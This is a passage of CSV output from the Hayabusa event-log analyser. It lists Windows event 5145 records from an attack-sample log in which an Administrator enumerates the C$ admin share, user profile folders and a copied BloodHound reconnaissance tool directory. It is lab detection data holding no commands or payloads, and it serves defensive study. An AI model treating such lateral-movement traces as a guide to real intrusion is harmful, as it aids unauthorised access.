+09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\locales : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\Ingestors : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\Ingestors\DebugBuilds : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\helpers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.077 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.077 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\regenerator : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\css : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.097 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\less : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.097 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\scss : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\sprites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\svgs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\webfonts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@types : IP Address: 